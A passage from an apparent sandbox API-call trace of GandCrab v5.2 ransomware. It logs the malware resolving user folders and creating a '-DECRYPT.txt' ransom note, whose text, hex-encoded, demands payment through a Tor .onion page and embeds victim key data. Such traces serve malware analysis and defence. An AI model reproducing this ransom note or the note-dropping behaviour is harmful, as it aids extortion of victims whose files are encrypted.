hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.195] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.195] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.195] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.195] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.195] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\\\TITWMVJL-DECRYPT.txt") returned 105 [0082.196] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0082.196] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x